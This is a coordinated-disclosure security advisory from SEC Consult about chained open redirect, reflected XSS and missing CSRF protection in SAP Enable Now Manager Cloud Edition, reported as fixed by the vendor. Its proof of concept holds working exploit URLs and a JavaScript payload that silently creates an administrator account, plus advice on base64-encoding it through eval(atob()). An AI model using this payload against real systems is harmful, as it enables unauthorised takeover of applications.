SEC Consult Vulnerability Lab Security Advisory < 20230927-0 >
=======================================================================
title: Multiple Vulnerabilities
product: SAP® Enable Now Manager
vulnerable version: 10.6.5 (Build 2804) Cloud Edition
fixed version: May 2023 Release
CVE number: N/A (cloud)
impact: high
homepage: https://www.sap.com/about.html
found: 2022-10-21
by: Paul Serban (Eviden)
Fabian Hagg (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Eviden business
Europe | Asia
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"SAP Enable Now solution provides advanced in-application help and
training capabilities helping you to improve productivity and user
adoption, as well as to increase satisfaction of the end-user experience.
Create, maintain, and deliver in-application help, learning materials,
and documentation content easily."
Source: https://www.sapstore.com/solutions/41243/SAP-Enable-Now
Business recommendation:
------------------------
Due to the Cloud Edition being affected, the vendor automatically pushed
a fix in the production environment in the May 2023 Release.
SEC Consult recommends to perform a thorough security review conducted by
security professionals to identify and resolve potential further critical
security issues.
Vulnerability overview/description:
-----------------------------------
Multiple vulnerabilities were identified that could be chained together in
order to allow a remote, unauthenticated attacker to create new administrative
user accounts by tricking the victim to click on a malicious link or visit
a malicious website prepared by the attacker.
1) Open Redirect/URL Redirection Vulnerability
The file download feature of the application contains an unvalidated
parameter value that exposes it to an open redirect vulnerability. An
attacker can create a malicious URL which would redirect the victim to
a malicious site, for example, a phishing site convincing the victim
to login once again.
2) Reflected Cross Site Scripting (XSS)
A reflected XSS vulnerability was found affecting the same parameter as
used in 1). Due to insufficient input validation and output encoding, an
attacker can inject arbitrary HTML or JavaScript code into the generated
server response, executing it in the browser of the victim. The vulnerability,
can be exploited, for example, to create new administrative user accounts
in the application, thereby fully compromising the application. Any CSRF
protection can be bypassed by means of this vulnerability.
3) Insufficient Cross-Site Request Forgery (CSRF) Protection
No implementation of CSRF protection was detected in the application.
Using this vulnerability, an attacker can issue requests in the context
of administrative user sessions. This includes critical state changing
actions such as user creation or role assignment. Note that in the
test environment the option 'Supported Functions' was set to value
'DISABLE-CSRF-PROTECTION' in the server settings feature of the application.
Certain configurations require this setting to be enabled, e.g. to allow
the SEN Workflow Approver extension to submit the data on behalf of the
logged-in user to the SAP Enable Now Manager. Without this parameter,
the extension will only be able to read the content and workflow information)
This indicates that there is an insecure feature which allows the protection
mechanism to be disabled globally. It could not be clarified if this is the
default setting. In any case, the function should still be enhanced to protect
critical actions such as functions used in user management or role/permission
management even if the mechanism is disabled by configuration.
Proof of concept:
-----------------
1) Open Redirect/URL Redirection Vulnerability
The public endpoint /resources/open_file.html is vulnerable to an
open redirect via GET parameter 'info'. To verify this vulnerability,
it is sufficient to open the following URL in a web browser.
https://example.enable-now.cloud.sap/resources/open_file.html?info=https://www.sec-consult.com
After browsing to the above link, the victim gets redirected to
www.sec-consult.com in a new browser window opened by the embedded
call of function window.open(). Note that both attacker and victim
do not have to be authenticated for successful exploitation.
2) Reflected Cross-Site Scripting (XSS)
The public endpoint /resources/open_file.html is affected by an XSS
vulnerability in GET parameter 'info'. To verify this vulnerability,
it is sufficient to open the following URL in a web browser.
https://example.enable-now.cloud.sap/resources/open_file.html?info=javascript:alert(document.domain)
After browsing to the above link, the domain property returns the
domain name of the server it was loaded from an alert window within
the browser of the victim. This proves the successful execution of the
injected JavaScript code. In fact, any kind of JavaScript code could
be injected by the attacker. Note that both attacker and victim do
not have to be authenticated for successful exploitation.
3) Insufficient Cross-Site Request Forgery (CSRF) Protection
No CSRF protection can be observed in POST requests sent between the
client and server. This includes at least the functions "task creation",
"user creation", "permission assignment" and "role/group assignment". Note
that this vulnerability appears to only affect systems where the CSRF protection
is disabled by option 'Supported Functions' set to value 'DISABLE-CSRF-PROTECTION'
in the server settings. Although this setting can be reverted, it is advised
to have the protection enabled for critical operations such as user creation
or permission assignment at any time (also when the option is set).
Several of the vulnerabilities above can be chained together by an
unauthenticated attacker. Considering the types of vulnerabilities,
there are multiple exploitation scenarios. In our example we will
create a link that, when clicked by an administrator victim, will
create a new admin account. For this attack to work, we first need
to gather some information. To create an account, we need to know two
important values: the OU and the UID. The OU represents the Organizational
Unit unique identifier. The UID here represents the unique Group ID
of our target group where we want our new user to be added. Performing
a simple GET request to endpoint /self/group, both values can be
obtained. The following listing shows the server response.
------------------------------------------------------------------------------------------------
HTTP/1.1 200
Cache-Control: no-cache, no-store, must-revalidate
Expires: 0
Vary: Origin
Set-Cookie: JSESSIONID=DD67AF<snip>ADF784; Path=/; Secure; HttpOnly;
Content-Type: text/json;charset=UTF-8
Server: SAP
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Content-Length: 396
{"response":{"group":[{"name":"Learners","uid":"G_1C67681<snip>60E0938C4CB086",
"ou":"OU_E8BC20E2<snip>8034410C", "active":true},{"name":"Master Authors","uid":
"G_72568DE0<snip>85DE0845","ou":"OU_E8BC20E2<snip>8034410C ","active":true},{"name
":"Administrators","uid":"G_3B5DBB<snip>A97DE47C4EDF","ou":"OU_E8BC20E2<snip>80344 <-- UID of admin group and OU
10C ","active":true}]}}
------------------------------------------------------------------------------------------------
Finally, in order for the attack to succeed, the attacker needs
the victim (logged in as administrator) to do first a request on
the above endpoint, then a POST request on the endpoint /!/user
to actually create the new user account with the administrator
role assigned using the values taken from the previous response.
These interactions can be scripted using the following ten lines
of JavaScript code.
------------------------------------------------------------------------------------------------
var req1 = new XMLHttpRequest();
req1.open('GET', "https://example.enable-now.cloud.sap/self/group",false);
req1.withCredentials = true;
req1.send();
var obj = JSON.parse(req1.responseText).response;
for (var i = 0; i< obj.group.length ;i++) {if (obj.group[i].name === 'Administrators') {var uid = obj.group[i].uid;var ou = obj.group[i].ou}};
var req2 = new XMLHttpRequest();
req2.open('POST',"https://example.enable-now.cloud.sap/!/user",false);
req2.withCredentials = true;
req2.send(JSON.stringify({"user":{"auth_user":"sapmatt","firstname":"SEC","lastname":"Consult","email":"","passwd":"sappass","role":[uid],"ou":ou}}));
------------------------------------------------------------------------------------------------
We can base64-encode this payload and pass it to the Javascript eval(atob())
function using the XSS vulnerability in the file download feature (seen in 2.).
The link could then be shortened to enhance the likelihood of successful
exploitation. This can be achieved, for example, by leveraging the Open Redirect
vulnerability (seen in 1.) to redirect the victim to an attacker-controlled
website and trigger the above payload, making it an attack more likely to
succeed. If the victim is logged into the application and is part of
the Administrator group, when they click on this link, a new admin
account will be instantly created. The attacker then can log in and has
full control over the application.
Vulnerable / tested versions:
-----------------------------
The following versions of the software were found to be vulnerable during our tests:
- SAP Enable Now Manager Version: 10.6.5 (Build 2804) - Cloud Edition (~October 2022)
Vendor contact timeline:
------------------------
2022-11-08: Contacting vendor via secure@sap.com
2022-11-10: Vendor requested screenshots and steps to reproduce
2022-11-10: Informed vendor the previously provided POC contains the steps to reproduce
and screenshots weren't available at that time
2022-11-10: Vendor confirmed issues are under review
2022-11-18: Contacted vendor to request an update
2022-11-18: Vendor confirmed issues are still under review
2022-12-01: Vendor reached back to confirm a Security Incident ticket was opened to
the Engineering Team
2023-02-02: Contacted vendor to request an update
2023-02-03: Vendor confirmed that engineering had fixes ready and waiting on a
release schedule.
2023-02-07: Vendor confirmed fix was deployed to production for ticket no #2280196564
2023-04-14: Contacted vendor to request update on ticket no #2280196563 fix
2023-04-17: Vendor mentioned that the fix is scheduled to be deployed in May release
2023-05-08: Vendor confirmed fix was deployed to production for 2280196563
2023-09-27: Public release of security advisory.
Solution:
---------
Due to the Cloud Edition being affected, the vendor automatically pushed
a fix in the production environment in the May 2023 Release.
Workaround:
-----------
None
Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Eviden business
Europe | Asia
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Eviden business. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/career/
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: security-research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: https://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF P. Serban, F. Hagg / @2023